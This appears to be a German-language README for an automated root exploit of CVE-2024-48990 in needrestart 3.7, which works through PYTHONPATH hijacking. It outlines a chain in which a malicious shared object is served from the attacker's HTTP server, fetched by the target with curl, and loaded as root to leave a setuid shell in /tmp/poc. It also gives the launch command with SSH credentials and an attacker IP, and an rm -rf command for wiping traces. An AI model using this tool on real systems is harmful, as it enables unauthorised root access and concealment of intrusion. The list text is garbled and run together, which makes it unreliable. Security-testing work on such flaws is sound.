
Automatisierter lokaler Privilege-Escalation-Exploit für CVE-2024-48990 (needrestart v3.7), der PYTHONPATH-Hijacking nutzt, um Root-Zugriff zu erlangen.
Dieses Tool automatisiert die Ausnutzung einer Privilegieneskalations-Schwachstelle in needrestart Version 3.7, die als CVE-2024-48990 identifiziert wurde.
Es erreicht Root-Ausführung, indem es die unsichere Verwendung der Umgebungsvariablen PYTHONPATH ausnutzt, wenn needrestart Python-Prozesse scannt.
Der Exploit funktioniert wie folgt:
__init__.so), das beim Import ausgelöst wird..so über einen lokalen HTTP-Server.PYTHONPATH-Umgebung.importlib importiert.needrestart, das den manipulierten PYTHONPATH erbt, das schädliche Modul lädt und die Nutzlast als Root ausführt./tmp/poc), das Root-Shell-Zugriff ermöglicht.Führen Sie den Exploit von Ihrem Angreifer-Rechner aus:
python3 exploit.py --user <ssh_user> --host <target_ip> --att-ip <attacker_ip> --ssh-pass <ssh_password>
Parameter:
needrestart Version 3.7Um Exploit-Spuren auf dem Ziel zu entfernen:
rm -rf /tmp/malicious /tmp/poc /tmp/exploit.sh
pexpect (pip3 install pexpect)gcc (zum Kompilieren der Nutzlast)python3 -m http.server (wird automatisch vom Skript gestartet)needrestart (v3.7)sudo NOPASSWD-Rechten für /usr/sbin/needrestartcurl installiertDieses Tool dient ausschließlich zu Bildungszwecken und für autorisierte Sicherheitstests. Verwenden Sie es nicht auf Systemen, die Ihnen nicht gehören, oder ohne ausdrückliche Genehmigung.